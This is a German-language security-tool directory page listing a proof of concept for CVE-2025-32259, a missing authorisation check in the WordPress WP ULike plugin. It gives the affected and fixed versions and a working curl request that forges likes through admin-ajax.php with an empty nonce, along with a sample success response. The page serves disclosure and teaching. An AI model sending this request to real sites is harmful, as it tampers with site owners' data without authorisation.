Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wp-ulike-cve-2025-32259-poc — In betroffenen Versionen des WP ULike-Plugins fehlt eine ordnungsgemäße Autorisierungsprüfung, bevor bestimmte AJAX-Aktionen oder Abstimmungsmanipulationen zugelassen werden. Dadurch können nicht authentifizierte Benutzer auf das Plugin in einer Weise zugreifen, die nur angemeldeten Benutzern möglich sein sollte – was potenziell Abstimmungen verfälscht oder irreführende Daten einschleust. | Kitploit
Tools/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

In betroffenen Versionen des WP ULike-Plugins fehlt eine ordnungsgemäße Autorisierungsprüfung, bevor bestimmte AJAX-Aktionen oder Abstimmungsmanipulationen zugelassen werden. Dadurch können nicht authentifizierte Benutzer auf das Plugin in einer Weise zugreifen, die nur angemeldeten Benutzern möglich sein sollte – was potenziell Abstimmungen verfälscht oder irreführende Daten einschleust.

Teilen

WP ULike ≤ 4.7.9.1 – Unauthentifizierter Content-Spoof (CVE-2025-32259)

🔬 Ein einfacher PoC, der CVE-2025-32259 im WP ULike-Plugin für WordPress demonstriert.
🚨 Nur für Bildungszwecke – nicht auf Systemen ohne ausdrückliche Genehmigung testen.


🧠 Übersicht

WP ULike ist ein beliebtes WordPress-Plugin, mit dem Benutzer Inhalte auf einer Website liken können. Versionen bis einschließlich 4.7.9.1 weisen eine fehlende Autorisierungsschwachstelle auf, die es nicht authentifizierten Benutzern ermöglicht, „Like“-Aktionen über AJAX-Anfragen zu fälschen.

  • CVE: CVE-2025-32259
  • Betroffene Versionen: ≤ 4.7.9.1
  • Behobene Version: 4.7.9.2

🚀 Proof-of-Concept

Die Schwachstelle ermöglicht es nicht authentifizierten Benutzern, mit dem AJAX-Endpunkt zu interagieren und beliebige Inhalte (Beiträge, Kommentare usw.) ohne Berechtigung zu liken.

🔧 PoC-Skript

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Ersetzen Sie id=1 durch eine gültige Beitrags-ID.

Eine erfolgreiche Antwort könnte wie folgt aussehen:
{"status":"success","msg":"You liked this."}
Tool herunterladen